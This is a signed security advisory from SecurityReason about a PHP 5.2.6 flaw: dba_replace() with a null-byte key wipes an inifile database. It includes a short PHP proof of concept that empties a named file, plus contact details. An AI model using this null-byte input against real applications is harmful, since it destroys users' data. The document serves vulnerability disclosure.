-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
[ SecurityReason.com PHP 5.2.6 dba_replace() destroying file ]
Author: Maksymilian Arciemowicz
http://securityreason.com
Date:
SecurityReason Research
SecurityAlert Id: 58
SecurityRisk: Medium
Affected Software: PHP 5.2.6
Advisory URL: http://securityreason.com/achievement_securityalert/58
Vendor: http://www.php.net
NOTE:
These functions build the foundation for accessing Berkeley DB style databases.
dba_replace - Replace or insert entry
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("HOME","/www/",$source);
?>
PATH=/
CURR=.
HOME=/home/
PATH=/
CURR=.
HOME=/www/
Well.
But, lets try use
<?php
$source=dba_open("/www/about.ini", "wlt", "inifile");
dba_replace("\0","/www/",$source);
?>
Now /www/about.ini, is emtpy.
http://cvs.php.net/viewvc.cgi/php-src/NEWS?r1=1.2027.2.547.2.1313&r2=1.2027.2.547.2.1314&
— 3. Greets —
sp3x p_e_a Infospec schain
— 4. Contact —
Author: SecurityReason [ Maksymilian Arciemowicz ]
Email: cxib [ a t] securityreason [d ot ] com
GPG: http://securityreason.pl/key/Arciemowicz.Maksymilian.gpg
http://securityreason.com
http://securityreason.pl
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (OpenBSD)
iEYEARECAAYFAkkvKDcACgkQpiCeOKaYa9aRUgCgmsbU4uKeq1E+/yyIlQas9V14
e2MAoJobXQNRD8BNiDsHQYSNdOxIyQRc
=Tb8r
-----END PGP SIGNATURE-----